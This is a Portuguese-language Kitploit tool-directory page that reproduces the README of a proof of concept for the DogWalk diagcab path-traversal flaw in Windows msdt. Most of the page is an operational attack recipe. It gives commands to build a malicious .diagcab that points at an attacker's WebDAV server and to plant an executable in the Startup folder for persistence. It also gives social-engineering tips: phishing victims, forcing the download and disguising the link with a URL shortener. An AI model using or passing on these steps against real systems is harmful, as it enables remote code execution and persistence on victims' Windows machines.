Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/ariary/dogwalk-rce-poc
Geração de PayloadsMecanismos de PersistênciaExploraçãoTestes de Penetração
GitHubariary/dogwalk-rce-poc

DogWalk-rce-poc

🐾Dogwalk PoC (usando arquivo diagcab para obter RCE no Windows)

Ver Repositório
76145há 4 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Dogwalk Proof-of-Concept🐾

root@kitploit:~

🚨 Aviso Legal 🚨

O PoC permite que um atacante obtenha em um dispositivo Windows da vítima. O objetivo deste repositório é tornar o PoC ainda mais utilizável do que o <a href= inicial. NÃO USE SEM AUTORIZAÇÃO PRÉVIA!



Injeção Remota de Código

https://github.com/irsl/microsoft-diagcab-rce-poc>repositório



Em relação aos danos causados e à simplicidade da exploração, espero que a Microsoft corrija isso
Atualização de julho de 2022: A Microsoft ainda não corrigiu a vulnerabilidade no msdt, mas o Microsoft Defender é capaz de detectá-la

  • 🧠 Entenda
  • 🐾 Rode
  • 📺 Mostre-me

Conceito central: vulnerabilidade de path traversal na tecnologia Diagcab da Microsoft (msdt) que pode levar à execução remota de código.
Você pode encontrar o advisory completo na postagem do blog
A vulnerabilidade foi reportada há 2 anos (por @irsl) e ainda não tem correção!

Como funciona?

O Proof-of-Concept configura um servidor webdav hospedando um arquivo .diagcab malicioso que fará um path traversal para gravar um executável malicioso em C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup. Gravar um executável nesta pasta fará com que ele seja executado toda vez que o usuário iniciar a máquina Windows; isso é chamado de Boot Logon Autostart Execution.

Então, basicamente o que precisamos é de:

  • servidor webDAV
  • arquivo .diagcab malicioso
  • executável malicioso (um legítimo ou um arquivo de texto simples é suficiente para o PoC)

🎬 Cenário

  1. A vítima visitará um link (phishing, engenharia social, ou o que for) que baixará o arquivo .diagcab

(💡 use o cabeçalho de resposta Content-type: application/octet-stream para fazer o navegador baixar automaticamente o arquivo ao acessar a url)

  1. A vítima clica no download do arquivo (pode acontecer facilmente/acidentalmente apenas clicando na pasta de downloads do navegador)
  2. O arquivo cab carrega o executável malicioso do webdav -> (path traversal) baixado na pasta de inicialização
  3. O usuário reinicia o dispositivo -> (RCE)

Vamos lá

Se você está com preguiça (ou com pressa) de seguir o passo a passo:

root@kitploit:~
./hurry-dogwalk.sh [WEBDAV_URL]         # need docker
# Stop the server
./hurry-dogwalk.sh --clean

Caso contrário ↓↓

🔨 Crie o arquivo .diagcab

  • arquivos .diagcfg são simples arquivos XML que contêm referência a um ou mais pacotes de diagnóstico e fornecem meta-informações sobre eles
  • Eles são empacotados em arquivos cabinet da Microsoft e salvos com a extensão .diagcab.

Primeiro construa custom.diagcfg:

root@kitploit:~
./build-malicious-diagcfg.sh --url [WEBDAV_URL]

E construa o hotfix895214.diagcab:

root@kitploit:~
cabarc.exe n hotfix895214.diagcab custom.diagcfg
# run it on windows (or with wine). If you do not find carbarc.exe use http://jc.bellamy.free.fr/download/cabarc.exe or http://download.microsoft.com/download/platformsdk/cab/2.0/w98nt42kmexp/en-us/Cabsdk.exe

Por fim, mova-o para o diretório ./webdav/diagcab-webdav-poc/config

🏗️ Configure o servidor

Coloque o executável que você deseja transferir para a máquina da vítima dentro do diretório ./webdav/malicious... (Aqui usamos o clássico calc.exe)

...E lance o servidor:

root@kitploit:~
cd ./webdav/diagcab-webdav-poc/
perl diagcab-webdav-poc.pl

O .diagcab malicioso está disponível em https://[WEBDAV_URL]/config/hotfix895214.diagcab. Agora você precisa atrair uma vítima para clicar nesse link.

(💡 você pode usar um encurtador de URL para que pareça menos suspeito)

👁️ Espere e veja

Configuração do Dogwalk

💡 por padrão, parece que a comunicação webdav não está habilitada. Veja mitigations.txt para obter uma solução alternativa para fazê-la funcionar

🐾🐾

demonstração

Baixar ferramenta